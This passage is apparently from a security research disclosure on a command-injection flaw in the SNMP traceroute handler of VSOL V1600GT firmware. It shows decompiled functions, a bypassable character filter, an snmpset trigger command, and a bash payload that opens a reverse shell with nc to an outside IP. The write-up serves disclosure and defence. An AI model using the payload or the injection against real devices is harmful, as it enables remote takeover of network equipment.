snmpset<span class="w"> </span>-v2c<span class="w"> </span>-c<span class="w"> </span>private<span class="w"> </span><span class="m">192</span>.168.8.200<span class="w"> </span>.1.3.6.1.4.1.37950.1.1.5.10.12.33.3.0<span class="w"> </span>i<span class="w"> </span><span class="m">1</span>
</code></pre></div>
<p>And <span style="color:red">stage0</span> containing the following <code>bash</code> script:</p>
<div class="highlight"><pre><span></span><code><span class="k">$(</span>mknod<span class="w"> </span>/tmp/bp<span class="w"> </span>p<span class="p">;</span>/bin/bash<span class="w"> </span><span class="m">0</span></tmp/bp<span class="w"> </span><span class="p">|</span><span class="w"> </span>nc<span class="w"> </span><span class="m">192</span>.168.8.199<span class="w"> </span><span class="m">1337</span><span class="w"> </span>>/tmp/bp<span class="k">)</span>
</code></pre></div>
<p>Following this, a small Python <a href="#python-exploit-for-the-snmp-handler">exploit</a>
was developed to demonstrate the vulnerability.</p>
<p><a href="resources/2026-05-19_vsol/c25.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c25.png" width="100%"/></a></p>
<p class="center-text">Figure 25 - Execution of the exploit with a payload designed to obtain a reverse shell.</p>
<p></p>
<p><a href="resources/2026-05-19_vsol/c26.png">
<img class="align-center" height="100%" src="resources/2026-05-19_vsol/c26.png" width="100%"/></a></p>
<p class="center-text">Figure 26 - Execution of the exploit with a payload designed to obtain a bind shell.</p>
<p></p>
<h3 id="model-v1600gt-binary-vsapp">Model V1600GT (binary: <span class="color-red">vsapp</span>)</h3>
<p>The firmware and the binary responsible for implementing the functionality vary
depending on the model. For the model V1600GT, the SNMP handler is implemented
by the binary <code>vsapp</code>.</p>
<h4 id="call-stack_1">Call stack</h4>
<ul>
<li><code>TracertDiagnoseProcessWriteReq()</code><ul>
<li><code>SetTracertDestIPorHostName()</code>, <code>SetTracertIPType()</code>, <code>SetTracertAction()</code><ul>
<li><code>snmp_tracert_diagnose()</code><ul>
<li><code>webs_diagnose_tracert_pthread()</code><ul>
<li><code>pthread_create()</code><ul>
<li><code>FUN_00c4ebe0()</code><ul>
<li><code>traceroute()</code><ul>
<li><code>safe_system_exec()</code><ul>
<li><code>FUN_013eb144()</code> Command Injection checker (but a bypass has been identified).</li>
<li><code>system_cmd()</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h4 id="details-of-impacted-functions_1">Details of impacted functions</h4>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>TracertDiagnoseProcessWriteReq()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined8</span>
<span class="nf">TracertDiagnoseProcessWriteReq</span>
<span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="w"> </span><span class="n">param_1</span><span class="p">,</span><span class="n">undefined8</span><span class="w"> </span><span class="n">param_2</span><span class="p">,</span><span class="n">undefined8</span><span class="w"> </span><span class="n">param_3</span><span class="p">,</span><span class="n">undefined8</span><span class="w"> </span><span class="n">param_4</span><span class="p">,</span><span class="n">undefined</span><span class="w"> </span><span class="o">*</span><span class="n">param_5</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">undefined8</span><span class="w"> </span><span class="n">uStack_8</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="p">)(</span><span class="n">param_1</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mh">0x34</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">SNMP_IS_DEBUG_ENABLE</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cl_vty_ppclient_out</span><span class="p">(</span><span class="s">"The column value is %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">iVar1</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_037cf8f0</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">uStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SetTracertIPType</span><span class="p">(</span><span class="n">param_3</span><span class="p">,</span><span class="n">param_4</span><span class="p">,</span><span class="n">param_5</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">uStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SetTracertAction</span><span class="p">(</span><span class="n">param_3</span><span class="p">,</span><span class="n">param_4</span><span class="p">,</span><span class="n">param_5</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">uStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SetTracertDestIPorHostName</span><span class="p">(</span><span class="n">param_3</span><span class="p">,</span><span class="n">param_4</span><span class="p">,</span><span class="n">param_5</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="o">*</span><span class="n">param_5</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mh">0x80</span><span class="p">;</span>
<span class="w"> </span><span class="n">uStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">uStack_8</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>SetTracertAction()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">SetTracertAction</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="n">param_2</span><span class="p">,</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">param_3</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'e'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="o">*</span><span class="n">param_3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\x03'</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">gv_tracertAction</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">snmp_tracert_diagnose</span><span class="p">(</span><span class="n">gv_tracertDestIPorHostName</span><span class="p">,</span><span class="n">gv_tracertIPType</span><span class="p">,</span><span class="n">iVar1</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="o">*</span><span class="n">param_3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\x03'</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="o">*</span><span class="n">param_2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">4</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="o">&</span><span class="n">gv_tracertAction</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>snmp_tracert_diagnose()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined8</span><span class="w"> </span><span class="nf">snmp_tracert_diagnose</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="kt">int</span><span class="w"> </span><span class="n">param_2</span><span class="p">,</span><span class="kt">int</span><span class="w"> </span><span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">undefined</span><span class="w"> </span><span class="n">auStack_120</span><span class="w"> </span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
<span class="w"> </span><span class="n">in_addr</span><span class="w"> </span><span class="n">aiStack_110</span><span class="w"> </span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="w"> </span><span class="n">undefined</span><span class="w"> </span><span class="n">auStack_108</span><span class="w"> </span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="w"> </span><span class="n">hostent</span><span class="w"> </span><span class="o">*</span><span class="n">phStack_8</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">param_3</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">param_2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">phStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">param_1</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">phStack_8</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="p">(</span><span class="n">hostent</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inet_aton</span><span class="p">(</span><span class="n">param_1</span><span class="p">,</span><span class="n">aiStack_110</span><span class="p">),</span><span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xffffffff</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(((</span><span class="n">param_2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">phStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">param_1</span><span class="p">),</span><span class="w"> </span><span class="n">phStack_8</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="p">(</span><span class="n">hostent</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">))</span>
<span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inet_pton</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span><span class="n">param_1</span><span class="p">,</span><span class="n">auStack_120</span><span class="p">),</span><span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xffffffff</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">stat</span><span class="p">(</span><span class="s">"/tmp/tracetest"</span><span class="p">,(</span><span class="n">stat</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">auStack_108</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">sprintf</span><span class="p">(</span><span class="n">auStack_108</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mh">0x80</span><span class="p">,</span><span class="s">"rm -rf %s"</span><span class="p">,</span><span class="s">"/tmp/tracetest"</span><span class="p">);</span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="n">auStack_108</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mh">0x80</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">strcpy</span><span class="p">(</span><span class="n">tracert_ipaddr</span><span class="p">,</span><span class="n">param_1</span><span class="p">);</span>
<span class="w"> </span><span class="n">tracert_flag</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="n">webs_diagnose_tracert_pthread</span><span class="p">();</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>webs_diagnose_tracert_pthread()</code></p>
<div class="highlight"><pre><span></span><code><span class="kt">int</span><span class="w"> </span><span class="nf">webs_diagnose_tracert_pthread</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">pthread_t</span><span class="w"> </span><span class="n">pStack_8</span><span class="p">;</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">pStack_8</span><span class="p">,(</span><span class="n">pthread_attr_t</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">,</span><span class="n">FUN_00c4ebe0</span><span class="p">,(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">puts</span><span class="p">(</span><span class="s">"wtd_app_init create fan_app_thread failed!</span><span class="se">\r</span><span class="s">"</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pthread_detach</span><span class="p">(</span><span class="n">pStack_8</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>FUN_00c4ebe0()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined4</span><span class="w"> </span><span class="nf">FUN_00c4ebe0</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">undefined4</span><span class="w"> </span><span class="n">uVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">uVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">traceroute</span><span class="p">(</span><span class="n">GLOBAL_VTY</span><span class="p">,</span><span class="n">tracert_ipaddr</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">uVar1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>traceroute()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined4</span><span class="w"> </span><span class="nf">traceroute</span><span class="p">(</span><span class="n">undefined8</span><span class="w"> </span><span class="n">status</span><span class="p">,</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">ip</span><span class="p">,</span><span class="kt">int</span><span class="w"> </span><span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">acStack_108</span><span class="w"> </span><span class="p">[</span><span class="mi">260</span><span class="p">];</span>
<span class="w"> </span><span class="n">undefined4</span><span class="w"> </span><span class="n">uStack_4</span><span class="p">;</span>
<span class="w"> </span><span class="n">uStack_4</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mh">0xffffffff</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">param_3</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">memset</span><span class="p">(</span><span class="n">acStack_108</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mh">0xff</span><span class="p">);</span>
<span class="w"> </span><span class="n">sprintf</span><span class="p">(</span><span class="n">acStack_108</span><span class="p">,</span><span class="s">"traceroute -m 15 %s"</span><span class="p">,</span><span class="n">ip</span><span class="p">);</span>
<span class="w"> </span><span class="n">uStack_4</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">safe_system_exec</span><span class="p">(</span><span class="n">acStack_108</span><span class="p">,</span><span class="n">status</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">param_3</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">memset</span><span class="p">(</span><span class="n">acStack_108</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mh">0xff</span><span class="p">);</span>
<span class="w"> </span><span class="n">sprintf</span><span class="p">(</span><span class="n">acStack_108</span><span class="p">,</span><span class="s">"traceroute -m 15 %s >%s"</span><span class="p">,</span><span class="n">ip</span><span class="p">,</span><span class="s">"/tmp/tracetest"</span><span class="p">);</span>
<span class="w"> </span><span class="n">uStack_4</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">safe_system_exec</span><span class="p">(</span><span class="n">acStack_108</span><span class="p">,</span><span class="n">status</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">vty_out</span><span class="p">(</span><span class="n">status</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_038ef980</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_038ef978</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">uStack_4</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>safe_system_exec()</code></p>
<div class="highlight"><pre><span></span><code><span class="kt">int</span><span class="w"> </span><span class="nf">safe_system_exec</span><span class="p">(</span><span class="n">undefined8</span><span class="w"> </span><span class="n">param_1</span><span class="p">,</span><span class="n">undefined8</span><span class="w"> </span><span class="n">param_2</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FUN_013eb144</span><span class="p">(</span><span class="n">param_1</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">system_cmd</span><span class="p">(</span><span class="n">param_1</span><span class="p">,</span><span class="n">param_2</span><span class="p">);</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>The function <code>safe_system_exec()</code> calls <code>FUN_013eb144()</code>, which seems to act as
a defense mechanism against Command Injections.</p>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>FUN_013eb144()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined8</span><span class="w"> </span><span class="nf">FUN_013eb144</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">byte</span><span class="w"> </span><span class="n">bVar1</span><span class="p">;</span>
<span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">sVar2</span><span class="p">;</span>
<span class="w"> </span><span class="n">ulong</span><span class="w"> </span><span class="n">uStack_8</span><span class="p">;</span>
<span class="w"> </span><span class="n">uStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="k">do</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">sVar2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">param_1</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">sVar2</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="n">uStack_8</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">bVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">param_1</span><span class="p">[</span><span class="n">uStack_8</span><span class="p">];</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x3b</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xffffffff</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bVar1</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mh">0x3c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x24</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffb</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x26</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffd</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x60</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffc</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x7c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xfffffffe</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">uStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">uStack_8</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="w"> </span><span class="nb">true</span><span class="w"> </span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">vsapp</span><br/>
Function: <code>system_cmd()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">ulong</span><span class="w"> </span><span class="nf">system_cmd</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="n">undefined8</span><span class="w"> </span><span class="n">param_2</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">uint</span><span class="w"> </span><span class="n">uVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">ulong</span><span class="w"> </span><span class="n">uVar2</span><span class="p">;</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">pcVar3</span><span class="p">;</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">acStack_88</span><span class="w"> </span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">pFStack_8</span><span class="p">;</span>
<span class="w"> </span><span class="n">pFStack_8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">popen</span><span class="p">(</span><span class="n">param_1</span><span class="p">,</span><span class="s">"r"</span><span class="p">);</span>
<span class="w"> </span><span class="p">...</span>
<span class="p">}</span>
</code></pre></div>
<h4 id="bypassing-the-filter">Bypassing the filter</h4>
<p>We can interpret function <code>FUN_013eb144()</code> as follows.</p>
<div class="highlight"><pre><span></span><code><span class="n">undefined8</span><span class="w"> </span><span class="nf">FUN_013eb144</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">input</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">byte</span><span class="w"> </span><span class="n">currentChar</span><span class="p">;</span>
<span class="w"> </span><span class="n">ulong</span><span class="w"> </span><span class="n">inputLength</span><span class="p">;</span>
<span class="w"> </span><span class="n">ulong</span><span class="w"> </span><span class="n">index</span><span class="p">;</span>
<span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="k">do</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">inputLength</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
